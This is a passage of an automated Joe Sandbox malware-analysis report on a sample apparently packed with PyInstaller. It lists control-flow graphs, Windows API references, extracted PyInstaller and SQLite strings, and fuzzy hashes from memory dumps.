35->48 49 7ff62c0f39fc-7ff62c0f3a2a call 7ff62c0f8940 call 7ff62c0f89a0 * 3 35->49 37 7ff62c0f38a5-7ff62c0f38ad 36->37 38 7ff62c0f38af-7ff62c0f38bd call 7ff62c0f89a0 36->38 37->38 38->35 53 7ff62c0f39b0-7ff62c0f39b9 40->53 41->28 42->16 58 7ff62c0f39f4-7ff62c0f39f7 call 7ff62c104f30 48->58 59 7ff62c0f38e7-7ff62c0f38ed 48->59 76 7ff62c0f3a2f-7ff62c0f3a3e call 7ff62c0f8830 49->76 53->53 54 7ff62c0f39bb-7ff62c0f39d8 call 7ff62c0f1950 53->54 54->26 65 7ff62c0f39de-7ff62c0f39ef call 7ff62c0f2710 54->65 58->49 63 7ff62c0f38f0-7ff62c0f38fc 59->63 66 7ff62c0f3905-7ff62c0f3908 63->66 67 7ff62c0f38fe-7ff62c0f3903 63->67 65->42 66->58 70 7ff62c0f390e-7ff62c0f3916 call 7ff62c104f30 66->70 67->63 67->66 70->76 79 7ff62c0f3a44-7ff62c0f3a47 76->79 80 7ff62c0f3b45-7ff62c0f3b53 76->80 79->80 81 7ff62c0f3a4d-7ff62c0f3a50 79->81 82 7ff62c0f3b59-7ff62c0f3b5d 80->82 83 7ff62c0f3a67 80->83 84 7ff62c0f3b14-7ff62c0f3b17 81->84 85 7ff62c0f3a56-7ff62c0f3a5a 81->85 86 7ff62c0f3a6b-7ff62c0f3a90 call 7ff62c104f30 82->86 83->86 88 7ff62c0f3b2f-7ff62c0f3b40 call 7ff62c0f2710 84->88 89 7ff62c0f3b19-7ff62c0f3b1d 84->89 85->84 87 7ff62c0f3a60 85->87 95 7ff62c0f3a92-7ff62c0f3aa6 call 7ff62c0f8940 86->95 96 7ff62c0f3aab-7ff62c0f3ac0 86->96 87->83 97 7ff62c0f3c7f-7ff62c0f3c87 88->97 89->88 91 7ff62c0f3b1f-7ff62c0f3b2a 89->91 91->86 95->96 99 7ff62c0f3be8-7ff62c0f3bfa call 7ff62c0f8830 96->99 100 7ff62c0f3ac6-7ff62c0f3aca 96->100 97->42 107 7ff62c0f3c2e 99->107 108 7ff62c0f3bfc-7ff62c0f3c02 99->108 102 7ff62c0f3ad0-7ff62c0f3ae8 call 7ff62c105250 100->102 103 7ff62c0f3bcd-7ff62c0f3be2 call 7ff62c0f1940 100->103 113 7ff62c0f3b62-7ff62c0f3b7a call 7ff62c105250 102->113 114 7ff62c0f3aea-7ff62c0f3b02 call 7ff62c105250 102->114 103->99 103->100 115 7ff62c0f3c31-7ff62c0f3c40 call 7ff62c104f30 107->115 111 7ff62c0f3c04-7ff62c0f3c1c 108->111 112 7ff62c0f3c1e-7ff62c0f3c2c 108->112 111->115 112->115 122 7ff62c0f3b7c-7ff62c0f3b80 113->122 123 7ff62c0f3b87-7ff62c0f3b9f call 7ff62c105250 113->123 114->103 124 7ff62c0f3b08-7ff62c0f3b0f 114->124 125 7ff62c0f3d41-7ff62c0f3d63 call 7ff62c0f44e0 115->125 126 7ff62c0f3c46-7ff62c0f3c4a 115->126 122->123 135 7ff62c0f3ba1-7ff62c0f3ba5 123->135 136 7ff62c0f3bac-7ff62c0f3bc4 call 7ff62c105250 123->136 124->103 139 7ff62c0f3d65-7ff62c0f3d6f call 7ff62c0f4630 125->139 140 7ff62c0f3d71-7ff62c0f3d82 call 7ff62c0f1c80 125->140 128 7ff62c0f3cd4-7ff62c0f3ce6 call 7ff62c0f8830 126->128 129 7ff62c0f3c50-7ff62c0f3c5f call 7ff62c0f90e0 126->129 145 7ff62c0f3d35-7ff62c0f3d3c 128->145 146 7ff62c0f3ce8-7ff62c0f3ceb 128->146 143 7ff62c0f3cb3-7ff62c0f3cbd call 7ff62c0f8660 129->143 144 7ff62c0f3c61 129->144 135->136 136->103 157 7ff62c0f3bc6 136->157 148 7ff62c0f3d87-7ff62c0f3d96 139->148 140->148 162 7ff62c0f3cbf-7ff62c0f3cc6 143->162 163 7ff62c0f3cc8-7ff62c0f3ccf 143->163 151 7ff62c0f3c68 call 7ff62c0f2710 144->151 145->151 146->145 152 7ff62c0f3ced-7ff62c0f3d10 call 7ff62c0f1c80 146->152 154 7ff62c0f3dbc-7ff62c0f3dd2 call 7ff62c0f9390 148->154 155 7ff62c0f3d98-7ff62c0f3d9f 148->155 164 7ff62c0f3c6d-7ff62c0f3c77 151->164 166 7ff62c0f3d12-7ff62c0f3d26 call 7ff62c0f2710 call 7ff62c104f30 152->166 167 7ff62c0f3d2b-7ff62c0f3d33 call 7ff62c104f30 152->167 172 7ff62c0f3dd4 154->172 173 7ff62c0f3de0-7ff62c0f3dfc SetDllDirectoryW 154->173 155->154 160 7ff62c0f3da1-7ff62c0f3da5 155->160 157->103 160->154 168 7ff62c0f3da7-7ff62c0f3db6 LoadLibraryExW 160->168 162->151 163->148 164->97 166->164 167->148 168->154 172->173 176 7ff62c0f3e02-7ff62c0f3e11 call 7ff62c0f8830 173->176 177 7ff62c0f3ef9-7ff62c0f3f00 173->177 189 7ff62c0f3e13-7ff62c0f3e19 176->189 190 7ff62c0f3e2a-7ff62c0f3e34 call 7ff62c104f30 176->190 179 7ff62c0f4000-7ff62c0f4008 177->179 180 7ff62c0f3f06-7ff62c0f3f0d 177->180 184 7ff62c0f402d-7ff62c0f4042 call 7ff62c0f36a0 call 7ff62c0f3360 call 7ff62c0f3670 179->184 185 7ff62c0f400a-7ff62c0f4027 PostMessageW GetMessageW 179->185 180->179 183 7ff62c0f3f13-7ff62c0f3f1d call 7ff62c0f33c0 180->183 183->164 197 7ff62c0f3f23-7ff62c0f3f37 call 7ff62c0f90c0 183->197 207 7ff62c0f4047-7ff62c0f405f call 7ff62c0f6fc0 call 7ff62c0f6d70 184->207 185->184 194 7ff62c0f3e25-7ff62c0f3e27 189->194 195 7ff62c0f3e1b-7ff62c0f3e23 189->195 199 7ff62c0f3eea-7ff62c0f3ef4 call 7ff62c0f8940 190->199 200 7ff62c0f3e3a-7ff62c0f3e40 190->200 194->190 195->194 210 7ff62c0f3f5c-7ff62c0f3f9f call 7ff62c0f8940 call 7ff62c0f89e0 call 7ff62c0f6fc0 call 7ff62c0f6d70 call 7ff62c0f88e0 197->210 211 7ff62c0f3f39-7ff62c0f3f56 PostMessageW GetMessageW 197->211 199->177 200->199 205 7ff62c0f3e46-7ff62c0f3e4c 200->205 208 7ff62c0f3e4e-7ff62c0f3e50 205->208 209 7ff62c0f3e57-7ff62c0f3e59 205->209 213 7ff62c0f3e52 208->213 214 7ff62c0f3e5f-7ff62c0f3e7b call 7ff62c0f6dc0 call 7ff62c0f7340 208->214 209->177 209->214 249 7ff62c0f3fa1-7ff62c0f3fb7 call 7ff62c0f8ed0 call 7ff62c0f88e0 210->249 250 7ff62c0f3fed-7ff62c0f3ffb call 7ff62c0f1900 210->250 211->210 213->177 228 7ff62c0f3e7d-7ff62c0f3e84 214->228 229 7ff62c0f3e86-7ff62c0f3e8d 214->229 233 7ff62c0f3ed3-7ff62c0f3ee8 call 7ff62c0f2a50 call 7ff62c0f6fc0 call 7ff62c0f6d70 228->233 230 7ff62c0f3e8f-7ff62c0f3e9c call 7ff62c0f6e00 229->230 231 7ff62c0f3ea7-7ff62c0f3eb1 call 7ff62c0f71b0 229->231 230->231 242 7ff62c0f3e9e-7ff62c0f3ea5 230->242 243 7ff62c0f3eb3-7ff62c0f3eba 231->243 244 7ff62c0f3ebc-7ff62c0f3eca call 7ff62c0f74f0 231->244 233->177 242->233 243->233 244->177 257 7ff62c0f3ecc 244->257 249->250 261 7ff62c0f3fb9-7ff62c0f3fce 249->261 250->164 257->233 262 7ff62c0f3fd0-7ff62c0f3fe3 call 7ff62c0f2710 call 7ff62c0f1900 261->262 263 7ff62c0f3fe8 call 7ff62c0f2a50 261->263 262->164 263->250
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                              • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                                              • API String ID: 2776309574-4232158417
                                                                                                                                                                                                                                              • Opcode ID: 0fbc70c4027613d0d861555d20556e9b1b6679d528821aa3e7ef290c14fd0fef
                                                                                                                                                                                                                                              • Instruction ID: 07fd297666852b32e2404955a40a48b84be1a2526650888eaf70879d5613dbf1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fbc70c4027613d0d861555d20556e9b1b6679d528821aa3e7ef290c14fd0fef
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5329D21A0C68299FE15DB259C6A3F92391AF557B0F444032DE4DC32C6EF6EE598C30A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: always$aolf$bolb$bolc$buod$duplicate column name: %s$generated$laer$rahc$too many columns on %s$txet
                                                                                                                                                                                                                                              • API String ID: 0-2711416707
                                                                                                                                                                                                                                              • Opcode ID: c6d4e951f0317217e6ba4f122beb4f7973f3fbefd4f05179ad54bf97b0fcfda1
                                                                                                                                                                                                                                              • Instruction ID: 8f09b48ab60fd1f4695731ea83ea178c5f00d79c0da61b7a326002b6691e2035
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6d4e951f0317217e6ba4f122beb4f7973f3fbefd4f05179ad54bf97b0fcfda1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9225772B0C6D245EB6D8B259070BB97FA1EB41B44F8881B6DABE473DACB3DD5418700

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 497 7ff62c115c00-7ff62c115c3b call 7ff62c115588 call 7ff62c115590 call 7ff62c1155f8 504 7ff62c115c41-7ff62c115c4c call 7ff62c115598 497->504 505 7ff62c115e65-7ff62c115eb1 call 7ff62c10a900 call 7ff62c115588 call 7ff62c115590 call 7ff62c1155f8 497->505 504->505 511 7ff62c115c52-7ff62c115c5c 504->511 531 7ff62c115eb7-7ff62c115ec2 call 7ff62c115598 505->531 532 7ff62c115fef-7ff62c11605d call 7ff62c10a900 call 7ff62c111578 505->532 512 7ff62c115c7e-7ff62c115c82 511->512 513 7ff62c115c5e-7ff62c115c61 511->513 516 7ff62c115c85-7ff62c115c8d 512->516 515 7ff62c115c64-7ff62c115c6f 513->515 518 7ff62c115c7a-7ff62c115c7c 515->518 519 7ff62c115c71-7ff62c115c78 515->519 516->516 520 7ff62c115c8f-7ff62c115ca2 call 7ff62c10d5fc 516->520 518->512 522 7ff62c115cab-7ff62c115cb9 518->522 519->515 519->518 527 7ff62c115cba-7ff62c115cc6 call 7ff62c10a948 520->527 528 7ff62c115ca4-7ff62c115ca6 call 7ff62c10a948 520->528 539 7ff62c115ccd-7ff62c115cd5 527->539 528->522 531->532 542 7ff62c115ec8-7ff62c115ed3 call 7ff62c1155c8 531->542 551 7ff62c11606b-7ff62c11606e 532->551 552 7ff62c11605f-7ff62c116066 532->552 539->539 540 7ff62c115cd7-7ff62c115ce8 call 7ff62c110474 539->540 540->505 550 7ff62c115cee-7ff62c115d44 call 7ff62c11a4d0 * 4 call 7ff62c115b1c 540->550 542->532 549 7ff62c115ed9-7ff62c115efc call 7ff62c10a948 GetTimeZoneInformation 542->549 565 7ff62c115f02-7ff62c115f23 549->565 566 7ff62c115fc4-7ff62c115fee call 7ff62c115580 call 7ff62c115570 call 7ff62c115578 549->566 609 7ff62c115d46-7ff62c115d4a 550->609 553 7ff62c116070 551->553 554 7ff62c1160a5-7ff62c1160b8 call 7ff62c10d5fc 551->554 557 7ff62c1160fb-7ff62c1160fe 552->557 558 7ff62c116073 553->558 575 7ff62c1160ba 554->575 576 7ff62c1160c3-7ff62c1160de call 7ff62c111578 554->576 557->558 562 7ff62c116104-7ff62c11610c call 7ff62c115c00 557->562 563 7ff62c116078-7ff62c1160a4 call 7ff62c10a948 call 7ff62c0fc550 558->563 564 7ff62c116073 call 7ff62c115e7c 558->564 562->563 564->563 570 7ff62c115f2e-7ff62c115f35 565->570 571 7ff62c115f25-7ff62c115f2b 565->571 579 7ff62c115f37-7ff62c115f3f 570->579 580 7ff62c115f49 570->580 571->570 584 7ff62c1160bc-7ff62c1160c1 call 7ff62c10a948 575->584 593 7ff62c1160e0-7ff62c1160e3 576->593 594 7ff62c1160e5-7ff62c1160f7 call 7ff62c10a948 576->594 579->580 586 7ff62c115f41-7ff62c115f47 579->586 589 7ff62c115f4b-7ff62c115fbf call 7ff62c11a4d0 * 4 call 7ff62c112b5c call 7ff62c116114 * 2 580->589 584->553 586->589 589->566 593->584 594->557 612 7ff62c115d4c 609->612 613 7ff62c115d50-7ff62c115d54 609->613 612->613 613->609 615 7ff62c115d56-7ff62c115d7b call 7ff62c106b58 613->615 621 7ff62c115d7e-7ff62c115d82 615->621 623 7ff62c115d91-7ff62c115d95 621->623 624 7ff62c115d84-7ff62c115d8f 621->624 623->621 624->623 626 7ff62c115d97-7ff62c115d9b 624->626 628 7ff62c115e1c-7ff62c115e20 626->628 629 7ff62c115d9d-7ff62c115dc5 call 7ff62c106b58 626->629 630 7ff62c115e27-7ff62c115e34 628->630 631 7ff62c115e22-7ff62c115e24 628->631 637 7ff62c115dc7 629->637 638 7ff62c115de3-7ff62c115de7 629->638 633 7ff62c115e36-7ff62c115e4c call 7ff62c115b1c 630->633 634 7ff62c115e4f-7ff62c115e5e call 7ff62c115580 call 7ff62c115570 630->634 631->630 633->634 634->505 641 7ff62c115dca-7ff62c115dd1 637->641 638->628 643 7ff62c115de9-7ff62c115e07 call 7ff62c106b58 638->643 641->638 645 7ff62c115dd3-7ff62c115de1 641->645 649 7ff62c115e13-7ff62c115e1a 643->649 645->638 645->641 649->628 650 7ff62c115e09-7ff62c115e0d 649->650 650->628 651 7ff62c115e0f 650->651 651->649
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115C45
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C115598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C1155AC
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A948: HeapFree.KERNEL32(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A95E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A948: GetLastError.KERNEL32(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A968
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF62C10A8DF,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10A909
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF62C10A8DF,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10A92E
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115C34
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C1155F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C11560C
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115EAA
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115EBB
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115ECC
                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF62C11610C), ref: 00007FF62C115EF3
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                              • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                              • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                              • Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                              • Instruction ID: d061b790e320011e79604dc9619bf2e00105fd14082ef2a8b2f39ae4daa24266
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8D1D526F0865286EF20DF2ADC4A1B96761EFA47B4F848036DE0DC7A95DF7CE4418742

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 698 7ffdfab89260-7ffdfab892df 699 7ffdfab892e5-7ffdfab892ef 698->699 700 7ffdfab8943d-7ffdfab89453 698->700 699->700 701 7ffdfab892f5-7ffdfab892f8 699->701 702 7ffdfab89459-7ffdfab8945f 700->702 703 7ffdfab8934f-7ffdfab89395 call 7ffdfab76160 700->703 701->702 705 7ffdfab892fe 701->705 702->703 706 7ffdfab89465-7ffdfab8947b call 7ffdfab76160 702->706 710 7ffdfab8939b-7ffdfab893ff memset 703->710 711 7ffdfab89a2e-7ffdfab89a31 703->711 708 7ffdfab89305-7ffdfab8930e 705->708 714 7ffdfab89a8e 706->714 719 7ffdfab89481-7ffdfab8949c 706->719 708->708 712 7ffdfab89310-7ffdfab8931f call 7ffdfab76160 708->712 716 7ffdfab89405-7ffdfab89421 memcpy 710->716 717 7ffdfab89728-7ffdfab89738 710->717 711->714 715 7ffdfab89a33-7ffdfab89a3a 711->715 712->714 727 7ffdfab89325-7ffdfab8933b memcpy 712->727 721 7ffdfab89a93-7ffdfab89aaa 714->721 722 7ffdfab89a85 715->722 723 7ffdfab89a3c-7ffdfab89a46 715->723 724 7ffdfab89427-7ffdfab89438 memcpy 716->724 725 7ffdfab895db 716->725 726 7ffdfab8967f-7ffdfab896a4 717->726 735 7ffdfab894b6-7ffdfab894bd 719->735 736 7ffdfab8949e-7ffdfab894af 719->736 722->714 732 7ffdfab89a48 723->732 733 7ffdfab89a4e-7ffdfab89a7b 723->733 731 7ffdfab895de-7ffdfab89627 memcpy * 2 724->731 725->731 729 7ffdfab896aa-7ffdfab896af 726->729 730 7ffdfab897df 726->730 734 7ffdfab89340-7ffdfab89347 727->734 729->730 737 7ffdfab896b5-7ffdfab896e1 call 7ffdfab7ff80 729->737 738 7ffdfab897e4-7ffdfab897f2 730->738 739 7ffdfab89629-7ffdfab89630 731->739 740 7ffdfab8967d 731->740 732->733 733->714 767 7ffdfab89a7d-7ffdfab89a83 733->767 734->734 741 7ffdfab89349 734->741 742 7ffdfab894c0-7ffdfab894c7 735->742 736->735 747 7ffdfab896e4-7ffdfab89704 737->747 743 7ffdfab897f5-7ffdfab897f8 738->743 744 7ffdfab89636-7ffdfab89640 739->744 745 7ffdfab8971a-7ffdfab89723 739->745 740->726 741->703 742->742 748 7ffdfab894c9-7ffdfab894d0 742->748 749 7ffdfab898ab-7ffdfab898b5 743->749 750 7ffdfab897fe-7ffdfab89819 call 7ffdfab887e0 743->750 751 7ffdfab89648-7ffdfab89675 744->751 752 7ffdfab89642 744->752 745->740 753 7ffdfab897da-7ffdfab897dd 747->753 754 7ffdfab8970a-7ffdfab89714 747->754 755 7ffdfab894d7-7ffdfab894de 748->755 759 7ffdfab898b7-7ffdfab898c0 749->759 760 7ffdfab898c3-7ffdfab898d6 call 7ffdfab846a0 749->760 750->749 773 7ffdfab8981f-7ffdfab89897 call 7ffdfab84ea5 750->773 751->740 793 7ffdfab89677 751->793 752->751 753->743 762 7ffdfab89716-7ffdfab89718 754->762 763 7ffdfab8973d-7ffdfab89740 754->763 755->755 764 7ffdfab894e0-7ffdfab894f7 755->764 759->760 774 7ffdfab898dc-7ffdfab898e6 760->774 775 7ffdfab89a20-7ffdfab89a2c 760->775 770 7ffdfab89742-7ffdfab8974a 762->770 763->770 771 7ffdfab89547-7ffdfab8954e 764->771 772 7ffdfab894f9 764->772 767->714 779 7ffdfab8974c-7ffdfab89760 call 7ffdfab87bb0 770->779 780 7ffdfab8976e-7ffdfab89784 call 7ffdfac36c60 770->780 781 7ffdfab89550-7ffdfab89557 771->781 782 7ffdfab89572-7ffdfab89579 771->782 776 7ffdfab89500-7ffdfab89507 772->776 792 7ffdfab8989d-7ffdfab898a3 773->792 789 7ffdfab898e8 774->789 790 7ffdfab898ee-7ffdfab89901 774->790 775->721 791 7ffdfab89510-7ffdfab89519 776->791 779->780 805 7ffdfab89762-7ffdfab89767 779->805 806 7ffdfab89786-7ffdfab8979b call 7ffdfabee090 780->806 807 7ffdfab8979d 780->807 781->703 785 7ffdfab8955d-7ffdfab8956c call 7ffdfac35c70 781->785 787 7ffdfab895ca 782->787 788 7ffdfab8957b-7ffdfab89585 782->788 785->703 785->782 804 7ffdfab895d3-7ffdfab895d6 787->804 798 7ffdfab89587 788->798 799 7ffdfab8958d-7ffdfab895ba 788->799 789->790 802 7ffdfab89909-7ffdfab8990f 790->802 791->791 800 7ffdfab8951b-7ffdfab89529 791->800 801 7ffdfab898a5 792->801 792->802 793->740 798->799 799->804 826 7ffdfab895bc-7ffdfab895c5 799->826 809 7ffdfab89530-7ffdfab89539 800->809 801->749 810 7ffdfab89938-7ffdfab89948 802->810 811 7ffdfab89911-7ffdfab89934 802->811 804->721 805->780 814 7ffdfab8979f-7ffdfab897a4 806->814 807->814 809->809 815 7ffdfab8953b-7ffdfab89545 809->815 820 7ffdfab8994a 810->820 821 7ffdfab89950-7ffdfab89981 810->821 811->810 817 7ffdfab897a6-7ffdfab897bc call 7ffdfac36c60 814->817 818 7ffdfab897d2-7ffdfab897d8 814->818 815->771 815->776 817->753 829 7ffdfab897be-7ffdfab897d0 call 7ffdfabee090 817->829 818->738 820->821 824 7ffdfab89983-7ffdfab89992 821->824 825 7ffdfab89994-7ffdfab8999b 821->825 828 7ffdfab8999f-7ffdfab899c1 call 7ffdfab87bb0 824->828 825->828 826->721 835 7ffdfab899c9-7ffdfab899cc 828->835 836 7ffdfab899c3-7ffdfab899c7 828->836 829->753 829->818 838 7ffdfab899ce-7ffdfab899d1 835->838 839 7ffdfab899d3 835->839 837 7ffdfab899d7-7ffdfab899e9 836->837 840 7ffdfab899eb-7ffdfab899f2 837->840 841 7ffdfab899f4-7ffdfab89a06 837->841 838->837 838->839 839->837 842 7ffdfab89a0a-7ffdfab89a1e 840->842 841->842 842->721
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                                                              • String ID: -journal$immutable$nolock
                                                                                                                                                                                                                                              • API String ID: 438689982-4201244970
                                                                                                                                                                                                                                              • Opcode ID: 534f87b9525e1accf40b52a836aaac86efe7d32416019845943bf01981245331
                                                                                                                                                                                                                                              • Instruction ID: 64ff999aeec9443a5c7f11163a9b42b244827bc4a526b9760c0db288854a0cf9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 534f87b9525e1accf40b52a836aaac86efe7d32416019845943bf01981245331
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3732A32AB0978286EB688F299560B793791FF45B95F448274CA7E0B7D9DF3CE452C300

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
